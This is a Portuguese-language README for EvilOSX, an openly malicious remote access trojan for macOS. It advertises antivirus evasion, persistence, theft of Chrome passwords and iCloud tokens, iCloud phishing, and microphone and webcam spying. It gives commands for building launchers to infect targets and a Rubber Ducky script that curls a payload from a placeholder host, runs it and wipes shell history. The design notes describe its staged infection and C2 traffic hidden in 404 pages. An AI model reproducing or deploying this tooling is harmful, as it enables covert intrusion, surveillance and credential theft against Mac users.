EvilOSX
Um RAT (Ferramenta de Administração Remota) malicioso para macOS / OS X.
Marco Generator por Cedric Owens
Este projeto não está mais ativo
Funcionalidades
- Emular uma instância do terminal
- Sistema de módulos simples e extensível
- Sem dependências de bot (python puro)
- Não detectado por antivírus (payloads criptografados com OpenSSL AES-256)
- Persistente
- Suporte a GUI e CLI
- Recuperar senhas do Chrome
- Recuperar tokens e contatos do iCloud
- Recuperar/monitorar a área de transferência
- Recuperar histórico do navegador (Chrome e Safari)
- Phishing para senhas do iCloud via iTunes
- Enumeração de backup do iTunes (iOS)
- Gravar o microfone
- Tirar uma captura de tela ou foto usando a webcam
- Tentar obter root via escalonamento de privilégio local
Como Usar
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX
# Go into the repository
$ cd EvilOSX
# Install dependencies required by the server
$ sudo pip install -r requirements.txt
# Start the GUI
$ python start.py
# Lastly, run a built launcher on your target(s)
Aviso: Como os payloads são criados de forma única para o sistema alvo (automaticamente pelo servidor), o servidor deve estar em execução quando qualquer bot se conectar pela primeira vez.
Usuários avançados
Há também uma CLI para aqueles que desejam usar isso via SSH:
# Create a launcher to infect your target(s)
$ python start.py --builder
# Start the CLI
$ python start.py --cli --port 1337
# Lastly, run a built launcher on your target(s)
Capturas de tela

Motivação
Este projeto foi criado para ser usado com meu Rubber Ducky, aqui está o script simples:
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/
DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500
REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER
STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
- Leva cerca de 10 segundos para backdoor qualquer Mac desbloqueado, o que é...... legal
- Terminal está escrito dessa forma intencionalmente, em alguns sistemas o Spotlight não encontrará o terminal de outra forma.
- Para contornar o assistente de configuração do teclado, certifique-se de alterar o VID&PID que pode ser encontrado aqui.
O Teclado de Alumínio (ISO) é provavelmente o que você está procurando.
Versionamento
EvilOSX será mantido sob as diretrizes de Versionamento Semântico tanto quanto possível.
As versões do servidor e do bot serão numeradas no seguinte formato:
E construídas com as seguintes diretrizes:
- Quebrar a compatibilidade reversa (com bots mais antigos) aumenta o major
- Novas adições sem quebrar a compatibilidade reversa aumentam o minor
- Correções de bugs e mudanças diversas aumentam o patch
Para mais informações sobre SemVer, visite https://semver.org/.
Notas de Design
- Infectar uma máquina é dividido em três partes:
- Um launcher é executado na máquina alvo cujo único objetivo é executar o stager
- O stager solicita ao servidor um loader que lida com como um payload será carregado
- O loader recebe um payload criptografado de forma única e então é enviado de volta ao stager
- O servidor oculta suas comunicações enviando mensagens ocultas em páginas de erro HTTP 404 (do BlackHat "Hiding In Plain Sight")
- Solicitações de comando são recuperadas do servidor via uma requisição GET
- Respostas de comando são enviadas ao servidor via uma requisição POST
- Módulos tiram proveito da natureza dinâmica do Python, eles são simplesmente enviados pela rede compactados com zlib, juntamente com quaisquer opções de configuração
- Como o bot apenas se comunica com o servidor e nunca o contrário, o servidor não tem como saber quando um bot fica offline
Problemas
Sinta-se à vontade para enviar quaisquer problemas ou solicitações de recursos aqui.
Contribuindo
Para um guia simples sobre como criar módulos, clique aqui.
Créditos
- O incrível projeto Empire
- Agradecimento a Patrick Wardle por suas palestras incríveis, confira Objective-See
- manwhoami por seus projetos: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts
(agora deletados... me avise se você reaparecer)
- O módulo slowloris é praticamente copiado do PySlowLoris
- urwid e este código que me poupou muito tempo com a CLI
- Logotipo criado por motusora
Licença
GPLv3